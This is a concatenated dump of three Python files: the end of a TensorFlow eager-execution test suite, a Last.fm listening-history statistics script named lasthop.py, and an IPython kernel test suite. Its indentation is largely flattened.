inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
    self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
      self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
configure_virtual_cpus()
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = constant_op.constant(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
lasthop.py
|
import os
import csv
import json
import multiprocessing
import raw_file_writer
import lastfm_user_data as lud
from datetime import datetime, timedelta
from shared.config import Config
# STATS_START_DATE = datetime.today() - timedelta(days=1)
STATS_START_DATE = datetime.today()
def go():
Lasthop.run()
class FormattedFileWriter:
def __init__(self, lastfm_username, lastfm_join_date):
self.username = lastfm_username
self.join_date = lastfm_join_date
self.api_key = Config.API_KEY
self.timezone_diff = self.get_timezone_diff()
self.raw_data_path = f"{Config.RAW_DATA_PATH}/users/{self.username}"
self.file_path = os.path.dirname(
os.path.realpath(__file__)
) + "/users/{username}".format(username=self.username)
if not os.path.exists(self.file_path):
os.makedirs(self.file_path)
self.raw_file_writer = raw_file_writer.RawFileWriter(
start_date=self.join_date,
end_date=STATS_START_DATE,
interval=raw_file_writer.Interval.YEAR.value,
include_lyrics=False,
)
def format_data_for_all_days(self):
days = self.get_list_of_dates()
jobs = []
for day in days:
job = multiprocessing.Process(target=self.write_files_for_day, args=(day,))
jobs.append(job)
job.start()
for job in jobs:
job.join()
def write_files_for_day(self, day):
self.raw_file_writer.write_raw_file_for_day(day)
self.write_formatted_file_for_day(day)
def get_list_of_dates(self):
date_to_process = STATS_START_DATE
days = []
while date_to_process >= self.join_date:
days.append(date_to_process)
date_to_process = date_to_process.replace(year=date_to_process.year - 1)
return days
def write_formatted_file_for_day(self, date):
formatted_file_name = self.get_formatted_filename_for_date(date)
if not self.file_needs_to_be_written(formatted_file_name, date):
return
raw_file_name = self.get_raw_filename_for_date(date)
with open(raw_file_name, "r+") as file:
raw_data = file.read()
json_data = json.loads(raw_data)
with open(formatted_file_name, "w+") as file:
if not json_data:
file.write("0")
return
for line in json_data:
if isinstance(line, dict):
artist = line.get("artist", {}).get("#text").replace("|", "")
title = line.get("name").replace(",", "")
play_date = line.get("date", {}).get(
"#text",
(datetime.now() - timedelta(hours=self.timezone_diff)).strftime(
"%d %b %Y, %H:%M"
),
)
play_date_datetime = datetime.strptime(
play_date, "%d %b %Y, %H:%M"
) + timedelta(hours=self.timezone_diff)
play_date_formatted = play_date_datetime.strftime(
"%Y/%m/%d %H:%M:%S"
)
line_to_write = f"{artist}|{title}|{play_date_formatted}"
file.write(line_to_write + "\n")
def get_raw_filename_for_date(self, date):
date_string = datetime.strftime(date, "%Y-%m-%d")
return f"{self.raw_data_path}/{date_string}raw.txt"
def get_formatted_filename_for_date(self, date):
date_string = datetime.strftime(date, "%Y-%m-%d")
return f"{self.file_path}/{date_string}.csv"
def get_filename_for_date(self, date):
date_string = datetime.strftime(date, "%Y-%m-%d")
return f"{self.file_path}/{date_string}.csv"
@staticmethod
def get_timezone_diff():
"""
Get difference in hours from UTC timezone. Daylight savings makes this variable.
:return: Timezone diff in hours
"""
        # Compare full datetimes (not just the hour field) so the result is also
        # correct when local time and UTC fall on different calendar days.
        return round((datetime.now() - datetime.utcnow()).total_seconds() / 3600)
@staticmethod
def file_needs_to_be_written(file_name, date):
"""
Check that the file exists and if it does, only re-write it if it's today's file.
        :param file_name: path of the formatted file to check
        :param date: the date the file covers
        :return: True if the file should be (re)written
"""
file_exists = os.path.exists(file_name) and os.stat(file_name).st_size > 0
file_is_today = date.date() == datetime.today().date()
return not (file_exists and not file_is_today)
class StatsCompiler:
def __init__(self, lastfm_username, lastfm_join_date):
self.username = lastfm_username
self.join_date = lastfm_join_date
self.file_path = os.path.dirname(
os.path.realpath(__file__)
) + "/users/{username}".format(username=self.username)
if not os.path.exists(self.file_path):
print(f"No data found for {self.username}")
self.yearly_data_dict = self.compile_stats()
def compile_stats(self):
days = self.get_list_of_dates()
yearly_data_dict = {}
for day in days:
yearly_data_dict[day] = self.read_file_for_day(day)
return yearly_data_dict
def all_artists(self):
days = self.get_list_of_dates()
result = []
for day in days:
result.append(self.all_artists_for_date(day))
return result
def all_artists_for_date(self, date):
artist_playcount_dict = self.get_artist_playcount_dict_for_date(date)
if artist_playcount_dict:
print(f"* - {date.year} - *")
for artist in sorted(
artist_playcount_dict,
key=artist_playcount_dict.__getitem__,
reverse=True,
):
print(
"\t{artist}: {plays}".format(
artist=artist.replace("'", "`"),
plays=artist_playcount_dict.get(artist),
)
)
def most_played_artists(self):
days = self.get_list_of_dates()
result = []
for day in days:
result.append(self.most_played_artist_for_date(day))
return result
def most_played_artist_for_date(self, date):
artist_playcount_dict = self.get_artist_playcount_dict_for_date(date)
if artist_playcount_dict:
highest_playcount = max(
artist_playcount_dict, key=artist_playcount_dict.get
)
day_list = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
count = artist_playcount_dict.get(highest_playcount)
artist = highest_playcount.split("|")[0]
return f"{date.year} ({day_list[date.weekday()]}): {artist} ({count})"
def get_artist_playcount_dict_for_date(self, date):
day_data_dict = self.yearly_data_dict.get(date)
artist_playcount_dict = {}
if day_data_dict:
for entry in day_data_dict:
artist_name = entry.split("|")[0]
if not artist_playcount_dict.get(artist_name):
artist_playcount_dict[artist_name] = 1
else:
artist_playcount_dict[artist_name] += 1
return artist_playcount_dict
def read_file_for_day(self, day):
track_time_stamp_dict = {}
with open(self.get_filename_for_date(day), "r+") as csv_file:
csv_reader = csv.reader(csv_file, delimiter="|")
for row in csv_reader:
if row[0] == "0":
break
artist = row[0]
title = row[1]
timestamp = row[2]
artist_track = f"{artist} | {title}"
if not track_time_stamp_dict.get(artist_track):
track_time_stamp_dict[artist_track] = [timestamp]
else:
timestamp_list = track_time_stamp_dict.get(artist_track)
timestamp_list.append(timestamp)
track_time_stamp_dict[artist_track] = timestamp_list
return track_time_stamp_dict
def get_list_of_dates(self):
date_to_process = STATS_START_DATE
days = []
while date_to_process >= self.join_date:
days.append(date_to_process)
date_to_process = date_to_process.replace(year=date_to_process.year - 1)
return days
def get_filename_for_date(self, date):
date_string = datetime.strftime(date, "%Y-%m-%d")
return f"{self.file_path}/{date_string}.csv"
class StatsPresenter:
    def __init__(self, username, real_name, join_date, total_tracks):
        self.username = username
self.real_name = real_name
self.join_date = join_date
self.total_tracks = total_tracks
self.avg_daily_tracks = int(
self.total_tracks / (STATS_START_DATE - self.join_date).days
)
self.stats_compiler = StatsCompiler(self.username, self.join_date)
def present(self):
intro = (
f"\n{self.real_name} has been on Last.fm for "
f"{(STATS_START_DATE.year - self.join_date.year)} years.\n"
f"They've played {self.total_tracks} tracks.\n"
f"That's an average of {self.avg_daily_tracks} track{'s' if self.avg_daily_tracks > 1 else ''} "
f"per day.\n"
)
print(intro)
print(
f"- - - - - - - - - - - - - {STATS_START_DATE.strftime('%B %-d')} - - - - - - - - - - - - - -\n"
)
print("- - - - - - - - - - - Most Played Artists - - - - - - - - - - - -")
for most_played in self.stats_compiler.most_played_artists():
if most_played:
print(most_played)
print("- - - - - - - - - - - - - All Artists - - - - - - - - - - - - - - -")
self.stats_compiler.all_artists()
class Lasthop:
@classmethod
def run(cls):
start_time = datetime.now()
Lasthop().lasthop()
print(f"\n(took {(datetime.now() - start_time).seconds} seconds)")
def __init__(self):
self.user_data = lud.UserData().get_lastfm_user_data()
def lasthop(self):
formatted_file_writer = FormattedFileWriter(
self.user_data["username"], self.user_data["join_date"]
)
formatted_file_writer.format_data_for_all_days()
presenter = StatsPresenter(
self.user_data["username"],
self.user_data["real_name"],
self.user_data["join_date"],
self.user_data["total_tracks"],
)
presenter.present()
if __name__ == "__main__":
Lasthop.run()
|
test_kernel.py
|
# coding: utf-8
"""test the IPython Kernel"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import io
import os.path
import sys
import time
import nose.tools as nt
from IPython.testing import decorators as dec, tools as tt
from ipython_genutils import py3compat
from IPython.paths import locate_profile
from ipython_genutils.tempdir import TemporaryDirectory
from .utils import (
new_kernel, kernel, TIMEOUT, assemble_output, execute,
flush_channels, wait_for_idle,
)
def _check_master(kc, expected=True, stream="stdout"):
execute(kc=kc, code="import sys")
flush_channels(kc)
msg_id, content = execute(kc=kc, code="print (sys.%s._is_master_process())" % stream)
stdout, stderr = assemble_output(kc.iopub_channel)
assert stdout.strip() == repr(expected)
def _check_status(content):
"""If status=error, show the traceback"""
if content['status'] == 'error':
assert False, ''.join(['\n'] + content['traceback'])
# printing tests
def test_simple_print():
"""simple print statement in kernel"""
with kernel() as kc:
iopub = kc.iopub_channel
msg_id, content = execute(kc=kc, code="print ('hi')")
stdout, stderr = assemble_output(iopub)
assert stdout == 'hi\n'
assert stderr == ''
_check_master(kc, expected=True)
def test_sys_path():
"""test that sys.path doesn't get messed up by default"""
with kernel() as kc:
msg_id, content = execute(kc=kc, code="import sys; print (repr(sys.path[0]))")
stdout, stderr = assemble_output(kc.iopub_channel)
assert stdout == "''\n"
def test_sys_path_profile_dir():
"""test that sys.path doesn't get messed up when `--profile-dir` is specified"""
with new_kernel(['--profile-dir', locate_profile('default')]) as kc:
msg_id, content = execute(kc=kc, code="import sys; print (repr(sys.path[0]))")
stdout, stderr = assemble_output(kc.iopub_channel)
assert stdout == "''\n"
@dec.skipif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_print():
"""printing from forked mp.Process"""
with new_kernel() as kc:
iopub = kc.iopub_channel
_check_master(kc, expected=True)
flush_channels(kc)
np = 5
code = '\n'.join([
"from __future__ import print_function",
"import time",
"import multiprocessing as mp",
"pool = [mp.Process(target=print, args=('hello', i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()",
"time.sleep(0.5),"
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout.count("hello"), np, stdout)
for n in range(np):
nt.assert_equal(stdout.count(str(n)), 1, stdout)
assert stderr == ''
_check_master(kc, expected=True)
_check_master(kc, expected=True, stream="stderr")
def test_subprocess_noprint():
"""mp.Process without print doesn't trigger iostream mp_mode"""
with kernel() as kc:
iopub = kc.iopub_channel
np = 5
code = '\n'.join([
"import multiprocessing as mp",
"pool = [mp.Process(target=range, args=(i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()"
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
assert stdout == ''
assert stderr == ''
_check_master(kc, expected=True)
_check_master(kc, expected=True, stream="stderr")
@dec.skipif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_error():
"""error in mp.Process doesn't crash"""
with new_kernel() as kc:
iopub = kc.iopub_channel
code = '\n'.join([
"import multiprocessing as mp",
"p = mp.Process(target=int, args=('hi',))",
"p.start()",
"p.join()",
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
assert stdout == ''
assert "ValueError" in stderr
_check_master(kc, expected=True)
_check_master(kc, expected=True, stream="stderr")
# raw_input tests
def test_raw_input():
"""test [raw_]input"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print({input_f}("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
assert msg['header']['msg_type'] == u'input_request'
content = msg['content']
assert content['prompt'] == theprompt
text = "some text"
kc.input(text)
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'ok'
stdout, stderr = assemble_output(iopub)
assert stdout == text + "\n"
@dec.skipif(py3compat.PY3)
def test_eval_input():
"""test input() on Python 2"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print(input("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
assert msg['header']['msg_type'] == u'input_request'
content = msg['content']
assert content['prompt'] == theprompt
kc.input("1+1")
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'ok'
stdout, stderr = assemble_output(iopub)
assert stdout == "2\n"
def test_save_history():
# Saving history from the kernel with %hist -f was failing because of
# unicode problems on Python 2.
with kernel() as kc, TemporaryDirectory() as td:
file = os.path.join(td, 'hist.out')
execute(u'a=1', kc=kc)
wait_for_idle(kc)
execute(u'b=u"abcþ"', kc=kc)
wait_for_idle(kc)
_, reply = execute("%hist -f " + file, kc=kc)
assert reply['status'] == 'ok'
with io.open(file, encoding='utf-8') as f:
content = f.read()
assert u'a=1' in content
assert u'b=u"abcþ"' in content
@dec.skip_without('faulthandler')
def test_smoke_faulthandler():
with kernel() as kc:
# Note: faulthandler.register is not available on windows.
code = u'\n'.join([
'import sys',
'import faulthandler',
'import signal',
'faulthandler.enable()',
'if not sys.platform.startswith("win32"):',
' faulthandler.register(signal.SIGTERM)'])
_, reply = execute(code, kc=kc)
nt.assert_equal(reply['status'], 'ok', reply.get('traceback', ''))
def test_help_output():
"""ipython kernel --help-all works"""
tt.help_all_output_test('kernel')
def test_is_complete():
with kernel() as kc:
# There are more test cases for this in core - here we just check
# that the kernel exposes the interface correctly.
kc.is_complete('2+2')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'complete'
# SyntaxError
kc.is_complete('raise = 2')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'invalid'
kc.is_complete('a = [1,\n2,')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'incomplete'
assert reply['content']['indent'] == ''
# Cell magic ends on two blank lines for console UIs
kc.is_complete('%%timeit\na\n\n')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'complete'
def test_complete():
with kernel() as kc:
execute(u'a = 1', kc=kc)
wait_for_idle(kc)
cell = 'import IPython\nb = a.'
kc.complete(cell)
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
c = reply['content']
assert c['status'] == 'ok'
assert c['cursor_start'] == cell.find('a.')
assert c['cursor_end'] == cell.find('a.') + 2
matches = c['matches']
nt.assert_greater(len(matches), 0)
for match in matches:
assert match[:2] == 'a.'
@dec.skip_without('matplotlib')
def test_matplotlib_inline_on_import():
with kernel() as kc:
cell = '\n'.join([
'import matplotlib, matplotlib.pyplot as plt',
'backend = matplotlib.get_backend()'
])
_, reply = execute(cell,
user_expressions={'backend': 'backend'},
kc=kc)
_check_status(reply)
backend_bundle = reply['user_expressions']['backend']
_check_status(backend_bundle)
assert 'backend_inline' in backend_bundle['data']['text/plain']
def test_message_order():
N = 100 # number of messages to test
with kernel() as kc:
_, reply = execute("a = 1", kc=kc)
_check_status(reply)
offset = reply['execution_count'] + 1
cell = "a += 1\na"
msg_ids = []
# submit N executions as fast as we can
for i in range(N):
msg_ids.append(kc.execute(cell))
# check message-handling order
for i, msg_id in enumerate(msg_ids, offset):
reply = kc.get_shell_msg(timeout=TIMEOUT)
_check_status(reply['content'])
assert reply['content']['execution_count'] == i
assert reply['parent_header']['msg_id'] == msg_id
def test_shutdown():
"""Kernel exits after polite shutdown_request"""
with new_kernel() as kc:
km = kc.parent
execute(u'a = 1', kc=kc)
wait_for_idle(kc)
kc.shutdown()
for i in range(100): # 10s timeout
if km.is_alive():
time.sleep(.1)
else:
break
assert not km.is_alive()
|